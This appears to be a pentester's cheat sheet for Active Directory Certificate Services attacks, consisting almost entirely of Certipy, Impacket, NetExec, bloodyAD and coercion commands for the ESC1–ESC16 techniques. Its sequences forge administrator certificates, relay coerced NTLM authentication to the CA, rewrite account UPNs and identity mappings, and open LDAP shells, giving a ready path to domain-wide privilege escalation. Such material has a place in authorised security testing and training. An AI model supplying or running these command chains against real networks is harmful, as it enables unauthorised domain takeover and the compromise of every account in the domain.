Installation
Certipy
Using pip
1
2
3
4
| $ sudo apt update && sudo apt install -y python3 python3-pip
$ python3 -m venv certipy-venv
$ source certipy-venv/bin/activate
$ pip install certipy-ad
|
Using pipx
1
| $ pipx install -f "git+https://github.com/ly4k/Certipy.git"
|
Using uv
1
| $ uv tool install git+https://github.com/ly4k/Certipy --force
|
Enumeration
Search for vulnerable certificate templates
1
| $ certipy find -u username -p password -dc-ip ip -target dc -enabled -vulnerable -stdout
|
Find PKI Enrollment Services in Active Directory and Certificate Templates Names
1
| $ nxc ldap target -u username -p password -M adcs
|
Anonymously uses RPC endpoints to hunt for ADCS CAs
1
| $ nxc smb target -M enum_ca
|
Attacks
ESC1
1
2
3
| $ impacket-addcomputer domain/username:password -computer-name computer_name -computer-pass computer_password
$ certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip
|
Or
1
2
3
4
5
6
7
8
9
10
| $ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip
If you run certipy and see Minimum RSA Key Length : 4096, you may need to provide the -key-size 4096 option
$ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096
$ certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip
$ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -sid <administrator sid> -dc-ip ip
|
ESC3
1
2
3
4
5
| $ certipy req -u username -p password -ca ca -target domain -template template
$ certipy req username -p password -ca ca -target domain -template User -on-behalf-of administrator -pfx pfx_file
$ certipy auth -pfx administrator.pfx -dc-ip ip
|
ESC4
1
2
3
4
5
6
| $ certipy template -u username@domain -p password -template template -write-default-configuration -no-save
$ certipy req -u username@domain -p password -ca ca -template template -upn administrator@domain
$ certipy auth -pfx administrator.pfx -dc-ip ip
|
ESC7
1
2
3
4
5
6
7
8
9
10
11
| $ certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
$ certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
$ certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain
$ certipy ca -ca ca -issue-request request_ID -u username@domain -p password
$ certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID
$ certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip
|
ESC8
1
2
3
4
5
| $ ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
$ coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue
$ certipy auth -pfx administrator.pfx
|
ESC9
1
2
3
4
5
6
7
8
9
| $ certipy shadow auto -u username@domain -hashes :hash -account target_username
$ certipy account update -u username@domain -hashes :hash -user target_username -upn administrator
$ certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target dc_ip
$ certipy account update -u username@domain -hashes :hash -user target_username -upn target_username
$ certipy auth -pfx administrator.pfx -domain domain
|
ESC10
Enumeration
1
2
3
| $ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc' -Name StrongCertificateBindingEnforcement
$ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel' -Name CertificateMappingMethods
|
Exploitation
Case 2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| $ certipy account -u username@domain -p password -dc-ip ip -target dc -upn dc$@domain -user victim update
$ impacket-getTGT domain/victim:password -dc-ip ip
$ export KRB5CCNAME=victim.ccache
$ certipy req -k -dc-ip ip -target dc -ca ca -template User
$ certipy account -k -dc-ip ip -target dc -upn victim@domain -user victim update
$ certipy auth -pfx dc.pfx -dc-ip ip -ldap-shell
# whoami
u:DOMAIN\DC$
# set_rbcd DC$ Machine_Account$
|
ESC13
1
2
3
4
| $ certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip
$ certipy auth -pfx file.pfx -dc-ip ip
|
ESC14
1
2
3
4
5
6
7
8
9
10
11
| $ bloodyAD --host dc -d domain -u username -p password set object target altSecurityIdentities -v 'X509:<RFC822>target@domain'
$ bloodyAD --host dc -d domain -u owned_user -p password set object target mail -v target@domain
$ certipy account update -u owned_user@domain -p password -user username -upn target
$ certipy req -u username -p password -ca ca -template template -dc-ip ip
$ certipy account update -u owned_user -p password -user username -upn username@domain -dc-ip ip
$ certipy auth -pfx pfx -dc-ip ip -user target -domain domain
|
ESC15
Scenario A
1
2
3
| $ certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template template -upn administrator@domain -sid <administrator sid> -application-policies 'Client Authentication'
$ certipy auth -pfx administrator.pfx -dc-ip ip -ldap-shell
|
Scenario B
1
2
3
4
5
| $ certipy req -u username@domain -p password -dc-ip ip -ca ca -template WebServer -application-policies 'Certificate Request Agent'
$ certipy req -u username@domain -p password -dc-ip ip -ca ca -template User -pfx user.pfx -on-behalf-of 'DOMAIN\Administrator'
$ certipy auth -pfx administrator.pfx -dc-ip ip
|
ESC16
We use a user that has GenericAll or GenericWrite
1
2
3
4
5
6
7
| $ certipy account -u owned_user@domain -p password -dc-ip ip -upn administrator -user username update
$ certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template User -upn administrator@domain -sid <administrator sid>
$ certipy account -u owned_user@domain -p password -dc-ip ip -upn username -user username update
$ certipy auth -pfx administrator.pfx -dc-ip ip -domain domain
|
